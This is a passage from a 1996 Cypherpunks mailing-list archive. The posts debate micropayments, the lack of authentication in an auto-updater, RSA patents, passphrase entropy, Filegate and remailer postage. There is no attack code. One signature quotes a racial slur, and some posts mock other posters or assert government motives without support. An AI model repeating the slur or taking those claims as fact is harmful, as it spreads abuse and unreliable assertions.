}>Your analogy breaks because you do not provide for the corresponding
}>of connections between the gas tank and the dashboard indicator for
}>the case of buying small items from many different vendors.
}>
}>I can see each vendor site giving you a "gas gauge" indicator, either
}>showing how much you have cumulatively charged at a given site, or how
}>much is left on your prepaid site account (these are the same thing in
}>terms of adding up charges), but I fail to see how your analog applies
}>outside the local control of each vendor site.
}
}the *vendor* *does*not* control the "gas gauge". the gauge is presented
}by your LOCAL SOFTWARE. (for those late into this, the gas gauge analogy
}is used as a visual metaphor for the way a browser would keep track
}of microcharges).  it would make *no*sense* for each provider to
}create their own gauge. they might create one for their own site
}of your transactions, but you absolutely must have a tracking mechanism
}that is built into your own software and NOT under the control of the
}outside agency. 
}
}don't people get this? with microcurrency, you don't say to a 
}seller, "bill me for this item". it would rarely work like that at
}all. instead, it is, "here is my money, please give me the item". 
}the money exchange is always part of the complete transaction. 
}billing is an archaic concept in this paradigm that is superfluous.
}you only need it when you can't have instantaneous transactions.
}
}>In short, you have again shown that microcharging systems are limited
}>to local accumulations.  Your gas tank example is limited to the car
}>you are driving, and does not tell you anything about anything else.
}
}the gas gauge analogy seemed transparently obvious to me. 
}you are proving a rule I've noted in cyberspace, that if anything
}can be misunderstood, it will be.  you are confusing yourself. 
}
}the analogy would be more like the
}following: you can drive on different roads, and some take more
}gas than others. but the roads cannot themselves suck gas
}out of your tank or change your gas meter.
}
}>Unfortunately, you appear to be applying the idea to a collection of
}>vendors which you wish to visit, which means that someone somewhere
}>must be getting the disparate charges from different vendors to update
}>your singular gas gauge.
}
}NO, NO, NO!!!! your local software controls your gas gauge. NOBODY
}ELSE. furthermore, the site *never* grabs money from you. this is
}a *billing* paradigm. you either send money, or no money can
}be transferred. the site can *request* money but such a system
}would only be automatic if the charge fell within the minimal limits
}set by the user (i.e. max $1.00 per hour, max 5c per transaction,
}max 10 transactions per minute, or whatever--  all this is 
}trivial to implement)
}
}>Drawing analogies is great fun, but all analogies break at some point
}>in their life, because they abstract away enough detail to paint a
}>simplified picture.  Sometime this leads to complete failure to map as
}>intended.
}
}analogies are meant to help people understand something simple. if the
}thing itself is simple, and people can't even understand it in
}the simple state, often the analogy will confuse them even further.
}
}>}The billing happens, as others have previously noted, entirely at the 
}>}client side.  There's no reason the wallet or web browser can't keep a 
}>}log of expenditures, and there's no chance for spoofery at that point 
}>}(the wallet knows where it sent money).  
}
}I wish people would stop talking about BILLING in regard to microcurrency.
}I believe it is mostly a flawed concept that is not largely going to
}apply to microcurrency. perhaps some other term is appropriate, any
}takers? it seems to me a lot of the misconceptions I've been seeing
}are based on the idea that BILLING would somehow be involved. 
}billing is involved in cash systems in which you dissociate the
}transfer of material from the transaction. this will generally
}not happen with microcurrency imho, and it is largely only useful
}with transactions that allow coupling of the material and the money
}in one swipe, such as for a http file download or whatever.
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 21 Jun 1996 10:54:06 +0800
To: nwlibertarians@teleport.com
Subject: Re: Take the money, Harry.
Message-ID: <199606202051.NAA03879@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:25 AM 6/20/96 -0800, Tonie Nathan wrote:
>>  Jim, 
>Harry should take the money.  As Ayn Rand said, "Don't let your morality be
>used against you."
>
>   I believe in the philosophy of law.  As long as it's legal, each person
>can take whatever he is legally entitled to from the government's stolen
>money, as long as he/she doesn't ADVOCATE that the coercive tax system be
>retained.   Many will not take grants, or welfare, but they are legally
>entitled to it.  As for the moral entitlement, that is a matter for them to
>work out for themselves. After all, we have to drive on government (tax
>supported) roads, etc.
>
>Tonie

[for the record, Tonie Nathan was the 1976 (?) Libertarian Vice Presidential 
Candidate.  Right, Tonie?]

I think the issue is fairly clear-cut, from a libertarian standpoint, _IF_ 
the money is accepted simply to be returned to the people it was stolen 
from.  That reduces the size of the net theft, produces publicity, and wakes 
the public up.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 21 Jun 1996 11:36:34 +0800
To: cypherpunks@toad.com
Subject: Re:Oil Change software snoops through hard drive
Message-ID: <v02140b00adef81075f5b@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Declan writes:
> Alan forwarded this to me. Thought it might be interesting. -Declan
[...auto updating software...]
> Unanswered Qs:
[...intersting questions which are raised by such a service...]

I saw no mention of authentication between the Oil Change client and server,
so the first question that I had was "how do you know if you are actually
connecting to the legitimate Oil Change server?"

Since the updates are via dialup a few bridge clips in the right location
would be all it takes to have the call re-routed to someone else's server
(and if the update is done over the net hijacking the system is not much
harder...) Once you have people getting your server instead of the Oil
Change server you _own_ their machine.  You can install whatever trojan
horses or backdoors you want under the guise of an update or direct the
user to pull a hacked update from a server you designate (and it wouldly
not be hard to set up a dummy software package so that even if you later
lose your override of the system or remove it to cover your tracks the
system continues to keep your backdoors installed.)  This is some very bad
mojo.

A little social engineering or midnight wiring and there will be a lot of
people in a world of pain. Nothing like designing a system which takes your
weak spot and makes it a security problem for every one of your customers...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 21 Jun 1996 13:54:05 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Micropayments: myth?
In-Reply-To: <16750.835302666@odin.nma.com>
Message-ID: <199606202143.OAA04899@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


a brief epistle as to the point as I can make it:

there are two money models that people are continuously conflating here:

1. I send money to someone who is selling something. they send me
that something. by definition, no billing was involved here.

2. I send a request to someone who is selling something. they send
me the something, along with a bill, which I have to pay, or possibly
decide not to. (the thing may arrive before or after the bill, 
wehther I pay, etc)

(2) is a whole class of systems in existence today, such as your cable
bill, your phone bill, etc.  much of these systems *might* be 
better implemented as (1) if/when (1) becomes available. (example,
your tv is charged micromoney, etc). but not *all* of them will be. 
(example: maybe phone companies prefer to accumulate chages and bill
at end of month. also, major "float" issues are often involved
here, although in that case not in their favor. "float" theoretically
evaporates with microcurrency)

regarding (2), it would be *possible* to have a billing system
that involved microcharges, but frankly I don't think this will
be very feasible or a wide use of the system. (1) and microcurrency
go together. (2) and microcurrency do not. is this fairly apparent
or should I give more examples?

lets say I consider hitting a web page that has a "rate" of 2c. I would not
call that a "bill". I haven't hit the page yet or requested a service.
but when I hit the page, the page says, "send me 2c". I would not 
call that a bill so much either in the classic sense-- it would be
like saying a cashier bills you when you hand them cash. well, yes,
in a strange way I guess but not really.

note that (1) presupposes that you actually have a cash type system.
systems such as credit cards whereby the payment is not necessarily
ensured, stuff like defaulting or rejecting a purchase etc. don't
fit in too well with microcurrency, in which we are talking about cash.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Sokol-Margolis <joseph@genome.wi.mit.edu>
Date: Fri, 21 Jun 1996 09:11:32 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: This might be interesting...
In-Reply-To: <199606190745.JAA21883@basement.replay.com>
Message-ID: <v03007101adef4d62f738@[18.157.1.107]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:15 PM -04006/20/96, you wrote:
> On Wed, 19 Jun 1996, Anonymous wrote:
>
> > Do an AltaVista Query on:
> >
> > 	url:bmh.com crypto*
>
> Mmmmm.  Mmmmm.  Mmmmmm.  Looks pretty tasty.  Those boys and girls at BMH
> obviously have fun jobs.
>
> Anyone have a password for this site?  The links look cool, but you can't
> get at 'em without a password or a hack...

Found out how to get a password. Sort of. I explored some of the site and
found this page http://www.bmh.com/ARPA/SynthEnv.html down at the bottom it
says:

Access to the password protected sections of our K/A database may be
obtained by request to
Debbie Adair. Please send an e-mail message explaining your need for
access. Be sure to include a
day time phone number and any pertinent information regarding your
employer/command.
<adair@bmh.com>


I guess it might be military only.



Joseph Sokol-Margolis
joseph@genome.wi.mit.edu
Systems Administrator






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darren New <dnew@yuan.fv.com>
Date: Fri, 21 Jun 1996 11:33:39 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606202143.OAA04899@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.93.960620151331.2161B-100000@yuan.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


> [...] "float" theoretically
> evaporates with microcurrency)

Ah, hmmm? How do you buy your microcurrency? Who has the float while you
have cyberbucks on your disk.  The float doesn't evaporate. It just goes
different places.

--
 Darren New / Dir. of Custom Software Design / First Virtual Holdings Inc.
  http://www.fv.com or info@fv.com  -=|=-  PGP Key: ftp://ftp.fv.com/pub/fv





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 21 Jun 1996 12:32:48 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Access Via Anonymous Re-Mailers (fwd)
In-Reply-To: <Pine.SUN.3.94.960620132244.17963B-100000@netcom17>
Message-ID: <Pine.SUN.3.94.960620160739.18365A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for posting this piece of nonsense, discussed some time ago on
this list, when a pointer to the URL would have been amply sufficient. 

For another view, including a backhanded dismissal of those arguments,
see, 

http://www.law.miami.edu/~froomkin/arbitr.htm

[Moving to  http://www.law.miami.edu/~froomkin/articles/arbitr.htm 
at some point....]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Fauvre <bobf@efn.org>
Date: Fri, 21 Jun 1996 12:46:11 +0800
To: nwlibertarians@teleport.com
Subject: Re[1]: NWLibs> Take the money, Harry.
In-Reply-To: <199606200831.BAA16798@haus.efn.org>
Message-ID: <Pine.SUN.3.91.960620162126.27290B-100000@garcia.efn.org>
MIME-Version: 1.0
Content-Type: text/plain



Right on, Tonie!

bobf
On Thu, 20 Jun 1996, Tonie Nathan wrote:

> >  Jim, 
> Harry should take the money.  As Ayn Rand said, "Don't let your morality be
> used against you."
> 
>    I believe in the philosophy of law.  As long as it's legal, each person
> can take whatever he is legally entitled to from the government's stolen
> money, as long as he/she doesn't ADVOCATE that the coercive tax system be
> retained.   Many will not take grants, or welfare, but they are legally
> entitled to it.  As for the moral entitlement, that is a matter for them to
> work out for themselves. After all, we have to drive on government (tax
> supported) roads, etc.
> 
> Tonie
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 21 Jun 1996 10:41:00 +0800
To: Intense <exalt@miworld.net>
Subject: Re: Current status of RSA patent...
In-Reply-To: <Pine.LNX.3.91.960620105421.115A-100000@invictor.miworld.net>
Message-ID: <199606202101.RAA29560@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Intense writes:
> does not matter - it will be renewed in the interest of the government
> The goverment want's there backdoor...  would you expect less?
> 
> the only pgp I will use is that from MIT
> it has no back door

Been popping magic mushrooms again?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 21 Jun 1996 11:43:06 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Safemail
Message-ID: <199606202137.RAA02239@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jun 96 at 10:29, Adam Shostack wrote in cypherpunks@toad.com:

> Not to defend the safemail folks, but this does remind me of something
> that NeXT did with Eliptic curve based systems; there was no storage
> of the private key, it was generated from the passphrase at run time.
> It was a side discussion, maybe with Andrew Lorenstien?  Andrew?

> Daniel R. Oelke wrote:

The HKS archives are still down, but a while back on the coderpunks 
list was an interestng idea about hashing a passphrase to seed a 
crypto PRNG and used the first good set of primes etc. for a secret 
and private key pair.  Only the private key is saved in such a case.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Fri, 21 Jun 1996 14:53:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Current status of RSA patent...
In-Reply-To: <199606201757.KAA08100@mail.pacifier.com>
Message-ID: <Pine.LNX.3.91.960620173131.120A-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jun 1996, jim bell wrote:

> At 10:59 AM 6/20/96 -0400, Intense wrote:
> >
> >does not matter - it will be renewed in the interest of the government
> >The goverment want's there backdoor...  would you expect less?
> 
> As far as I know, patents can't be "renewed."  I've heard they can be 
> "re-issued," amended, but to my knowledge that doesn't extend their term.

That is probably true...  But, i am sure that goverment is going to want 
to keep there backdoors, they have showed no interest in it's citizens 
priviciy as of yet...  and i doubt they have changed... 

MdS


               *          <exalt@miworld.net>           *







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Fri, 21 Jun 1996 11:50:24 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Current status of RSA patent...
In-Reply-To: <199606202101.RAA29560@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.91.960620173417.120B-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jun 1996, Perry E. Metzger wrote:

> 
> Intense writes:
> > does not matter - it will be renewed in the interest of the government
> > The goverment want's there backdoor...  would you expect less?
> > 
> > the only pgp I will use is that from MIT
> > it has no back door
> 
> Been popping magic mushrooms again?
> 
> 

ive not had one of those in a long time :>


               *          <exalt@miworld.net>           *






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 21 Jun 1996 15:31:18 +0800
To: declan@well.com
Subject: Stop Cross-Copying (Re: Take the money, Harry, re.)
Message-ID: <adef526200021004eca4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:19 PM 6/20/96, RogErick@aol.com wrote:

>  I agree with you, Tonie, as usual.
>   I struggled with this, for years, until I had a dream.  I was on a
>battlefield, pinned down by enemy fire, and I was out of ammunition.
....


Hey, folks, I'm a libertarian, and even voted for John Hospers in 1972. But
the Cypherpunks mailing list has over 1200 subscribers, and cross-copying
to it for these debates is not a good idea. I presume the same is true
about cross-copying Cypherpunks stuff onto "nwlibertarians@teleport.co,"
but I can't say for sure.

What I know is that wide cross-posting (or cross-copying) is the bane of
lists these days. There are so many lists, so much overlap, that the
temptation is great to cc: any conceivably-related list.

Hey, no one speaks for Cypherpunks, least of all me, but I think
cross-copying between libertarian, or digital commerce, or Wobbly, or
International Socialist Women of Color, or Unabomber Brigade mailing lists
to the Cypherpunks list is inappropriate.

--Tim May, member of Cypherpunks list, but not the others

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Lewine <alewine@dcez.com>
Date: Sat, 22 Jun 1996 06:29:42 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Oil Change software snoops through hard drive
In-Reply-To: <Pine.GUL.3.93.960620104638.4657A-100000@Networking.Stanford.EDU>
Message-ID: <31CA063E.350B@dcez.com>
MIME-Version: 1.0
Content-Type: text/plain


But this isn't MS's RegWiz. It's capabilities sound much greater, and 
it's not clear how to opt out, etc. from the press release:
<< Oil
Change reportedly tracks all currently installed versions and revisions
of all
Windows 95 software and hardware drivers on a PC, and then dials into
CyberMedia's Internet Web Server for related updates.>>
is this thing scary? I don't know. Does software like it have potential 
for abuse? Absolutely. Fear mongering? I don't think so. Just a Heads up.

Alan Lewine
------
Rich Graves wrote:
> 
> On Wed, 19 Jun 1996, Declan McCullagh wrote:
> 
> > Alan forwarded this to me. Thought it might be interesting. -Declan
> [..].]
> > Unanswered Qs:
> > 1) What other kinds of info does/can it troll for?
> > 2) What does it do when it finds unregistered software?
> > 3) Does it implicate ECPA?
> > 4) Will updates be available through other means?
> > 5) Must a user affirmatively grant permission to the software agent?
> > 6) Can a user decline or limit the agent's access?
> > 7) What uses may the agent's owner make of data collected?
> > etc.
> 
> Well, if you want definitive answers, use Stan Mitchell's File Monitor,
> ftp://ftp.ora.com/pub/examples/windows/win95.update/schulman.html#w95fmon> 
> But free to fear-monger in any case...
> 
> -rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 21 Jun 1996 16:04:16 +0800
To: cypherpunks@toad.com
Subject: Re: Safemail
Message-ID: <adef550a010210048c61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:32 PM 6/20/96, Deranged Mutant wrote:
>On 20 Jun 96 at 10:29, Adam Shostack wrote in cypherpunks@toad.com:
>
>> Not to defend the safemail folks, but this does remind me of something
>> that NeXT did with Eliptic curve based systems; there was no storage
>> of the private key, it was generated from the passphrase at run time.
>> It was a side discussion, maybe with Andrew Lorenstien?  Andrew?
>
>> Daniel R. Oelke wrote:
>
>The HKS archives are still down, but a while back on the coderpunks
>list was an interestng idea about hashing a passphrase to seed a
>crypto PRNG and used the first good set of primes etc. for a secret
>and private key pair.  Only the private key is saved in such a case.

I haven't seen this particular idea, but a general point to always bear in
mind is that "entropy doesn't increase" (despite what you may have heard
about that other kind of entropy....).

To wit, if there are N bits of entropy in a passphrase (or whatever is the
basic key, be it typed in, read from a floppy, whatever), then no amount of
deterministic crunching by a PRNG (or whatever) will increase this.

(I say "deterministic" in the sense that all parties presumably need to run
the same PRNG and get the same output from the same "seed" (= passphrase,
in this scheme). Thus, the PRNG cannot add additional randomness or
entropy. Unless I am misunderstanding the proposal...)

So, if the passphrase is 22 characters, as in the "Safemail" proposal (such
as it is), that's all that can be gotten. Period. There just aren't enough
"places" in the space of starting points. Anyone with access to the
algorithms used to process the 22 characters (154 bits if 7 bits are used
for each character) can brute force search the space in a relatively short
time. (If the later processing algorithms are supposed to be "secret," then
of course this a cryptographic faux pas of the first magnitude, usually
dismissed as "security through obscurity.")

By the way, amongst other defects, "Safemail" is a pretty bad name for a
company, being that RSA Data Security has or had a product called
"MailSafe."

(The same thing happened with the Web search tool made by "Architext."
There was a Macintosh hypertext program with the same name, which I bought
in 1990. Someone I knew who worked for Architext was confused by my
denunciation of Architext....such name collisions make for interesting
situations.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 21 Jun 1996 13:48:41 +0800
To: pam@intertrader.com
Subject: Search for WWW consultants.
Message-ID: <9606202345.AA07200@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


        If anyone out there is interested in doing some SSL work, talk to
David Normandin at the number below. Feel free to forward this to people you
know that would be interested in doing this sort of work in the Boston area.

>X-Sender: ceim@careerenhancement.com (Unverified)
>Date: Thu, 20 Jun 1996 15:37:04 -0500
>To: reagle@rpcp.mit.edu
>From: concepts@careercncepts.com (Career enhancement)
>Subject: Search for WWW consultants.
>
>Hi Joe, thanks for helping me with this. What I'm looking for are skill sets
>in secured socket layers for the WWW, and those with search engines
>skills.These are very HOT,long term assignments with rates paying between
>60 & 90 on an hourly rate. In addition I also have multiple needs for CGI &
>Perl scripting consultants. Please have them forward thier information to
>me via e-mail, fax @ 617-270-4443 or call me @ 617-270-4441. Again thanks
>for your help and good luck in NY. David Normandin
_______________________
Regards,            Democracy is where you can say what you think 
                    even if you don't think. -
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 22 Jun 1996 05:45:47 +0800
To: exalt@miworld.net (Intense)
Subject: Re: Current status of RSA patent...
In-Reply-To: <Pine.LNX.3.91.960620173131.120A-100000@invictor.miworld.net>
Message-ID: <m0uWu3y-0000w4C@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Intense enscribed thusly:

> On Thu, 20 Jun 1996, jim bell wrote:

> > At 10:59 AM 6/20/96 -0400, Intense wrote:

> > >does not matter - it will be renewed in the interest of the government
> > >The goverment want's there backdoor...  would you expect less?
         ^^^^^^^^^ ^^^^^^ ^^^^^              ^
> > As far as I know, patents can't be "renewed."  I've heard they can be 
> > "re-issued," amended, but to my knowledge that doesn't extend their term.
> 
> That is probably true...  But, i am sure that goverment is going to want 
                                 ^              ^^^^^^^^^
> to keep there backdoors, they have showed no interest in it's citizens 
          ^^^^^                                            ^^^^
> priviciy as of yet...  and i doubt they have changed... 
  ^^^^^^^^                   ^
> MdS

	Uh....  Wait a minute.  I don't normally pick on spelling and
grammar errors (heaven knows - I make enough myself) but this discussion,
over patents and laws, seems to be involving someone bent on setting a
record for ridiculous errors.  Is "Intense" a child?  (Actually my children,
all three of them, would not make these mistakes!)  We see here a discussion
over points of patent law and government policy, and Jim seems to be having
a battle of wits with a half-armed opponent.

>                *          <exalt@miworld.net>           *

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 21 Jun 1996 16:33:05 +0800
To: cypherpunks@toad.com
Subject: Bal's PKS; pgp.net?
Message-ID: <199606210100.VAA15440@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


In addition to Bal's public key server being unavailable...

www.pgp.net yields University of Paderborn's Mathematics department in
Germany, with a link to a page in English which currently doesn't exist.

--
The word "gaijin" literally means "foreign person". Many Westerners like to
think that the Japanese use it in the same way as the Grand Dragon of the Ku
Klux Klan uses "nigger", but it ain't really true. They use it when they mean
"nigger", but they also sometimes use it to mean "honorable nigger".
 - Bill Lambert in soc.couples.intercultural
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 21 Jun 1996 14:57:40 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Federal Key Registration Agency
In-Reply-To: <Pine.3.89.9606201224.B27834-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SUN.3.94.960620211746.20271D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have seen the text of the speech.  The wire service accounts wildly,
wildly exaggerate.  This is a non-story...except for AG Reno's assertion
that it would take the government a year to break one DES message with a
"supercomputer".  She presumably believes this.  We know the number for
known plaintext attacks, but assuming you don't have a known plaintext,
what's a more reasonable assumption? 

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 22 Jun 1996 01:18:40 +0800
To: cypherpunks@toad.com
Subject: Re: NWLibs> Stop Cross-Copying (Re: Take the money, Harry, re.)
Message-ID: <199606210424.VAA28106@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:14 PM 6/20/96 -0700, Timothy C. May wrote:
>At 5:19 PM 6/20/96, RogErick@aol.com wrote:
>
>>  I agree with you, Tonie, as usual.
>>   I struggled with this, for years, until I had a dream.  I was on a
>>battlefield, pinned down by enemy fire, and I was out of ammunition.
>....
>
>
>Hey, folks, I'm a libertarian, and even voted for John Hospers in 1972. But
>the Cypherpunks mailing list has over 1200 subscribers, and cross-copying
>to it for these debates is not a good idea. I presume the same is true
>about cross-copying Cypherpunks stuff onto "nwlibertarians@teleport.co,"
>but I can't say for sure.
>
>What I know is that wide cross-posting (or cross-copying) is the bane of
>lists these days. There are so many lists, so much overlap, that the
>temptation is great to cc: any conceivably-related list.
>
>Hey, no one speaks for Cypherpunks, least of all me, but I think
>cross-copying between libertarian, or digital commerce, or Wobbly, or
>International Socialist Women of Color, or Unabomber Brigade mailing lists
>to the Cypherpunks list is inappropriate.

The subject was the use of digital cash for accepting Federal matching 
funds.  I cross-posted ONE message.  It was appropriately on-topic in both areas.

Okay?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 21 Jun 1996 21:27:34 +0800
To: Intense <exalt@miworld.net>
Subject: Re: Current status of RSA patent...
Message-ID: <199606210424.VAA28110@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 6/20/96 -0400, Intense wrote:
>On Thu, 20 Jun 1996, jim bell wrote:
>
>> At 10:59 AM 6/20/96 -0400, Intense wrote:
>> >
>> >does not matter - it will be renewed in the interest of the government
>> >The goverment want's there backdoor...  would you expect less?
>> 
>> As far as I know, patents can't be "renewed."  I've heard they can be 
>> "re-issued," amended, but to my knowledge that doesn't extend their term.
>
>That is probably true...  But, i am sure that goverment is going to want 
>to keep there backdoors, they have showed no interest in it's citizens 
>priviciy as of yet...  and i doubt they have changed... 

Yes, it's true.  I happen to believe that the only purpose the government 
had in granting patents on public key and RSA is to help keep it from the 
public.  They did a fair job, but the patents expire in 1-4 years and it'll 
be too late by then.  Their attempts to foist the Clipper standard on us 
didn't work.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 21 Jun 1996 21:44:45 +0800
To: cypherpunks@toad.com
Subject: "Filegate" may be good news for us
Message-ID: <adef772602021004900e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The current flap over the Clinton Administration's request for and receipt
of FBI dossiers is being called "Filegate." The Administration has claimed
the requests were innocent, and based on outmoded Secret Service lists. The
Secret Service denies this, and says the list did not come from them. Some
say the list was of "Clinton's enemies," as it contained mostly leading
Republicans and Bush Administration staffers (even including former Sec. of
State Jim Baker).

Investigations are underway, and Att. General Janet Reno is suggesting that
Whitewater special prosecutor Kenneth Starr handled this investigation.

Why is this good news for us? (Besides the partisan issue of embarrassing
and degrading the current government, which is always a good thing.)

Because it underscores how difficult it is, even with ostensible
safeguards, to control the distribution of dossiers, secret files, and
surveillance reports. If the White House can order up several hundred
supposedly-secret FBI dossiers on leading Republicans and political
enemies, imagine what they could do with "voluntarily escrowed" crypto
keys!

(We all know all this, of course. My point is that this is providing a
timely demonstration of how little government can be trusted to keep its
secrets.)

In this political year, this "Filegate" flap may effectively table any
serious discussions of Reno-type GAK.

Not all news is bad.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 21 Jun 1996 22:29:22 +0800
To: cypherpunks@toad.com
Subject: Re: Recipients get the postage
Message-ID: <adef7a0e030210043ecb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 AM 6/19/96, Hal wrote:

>I was reading old threads on remailers, where various ideas were
>suggested to reduce abuse.  One was to charge postage, in order to
>discourage spam and somewhat discourage nastygrams, as well as to
>compensate the remailer operator for his risks.  A variant was to tell
>the recipient that he had anonymous mail waiting, and possibly charge him
>to receive it.
>
>I had a different idea, which has probably been suggested before: make
>the sender of the anonymous mail pay, but pass the money to the
>recipient.

An interesting variant; I would certainly like to see _any_ of the various
digital postage ideas tried. Alas, none have (save for Sameer's option for
charging for remailings).

However, I can see some problems which I think would arise with Hal's
"recipient gets postage" scheme.

* in an ecology of several types of remailers, some not charging postage,
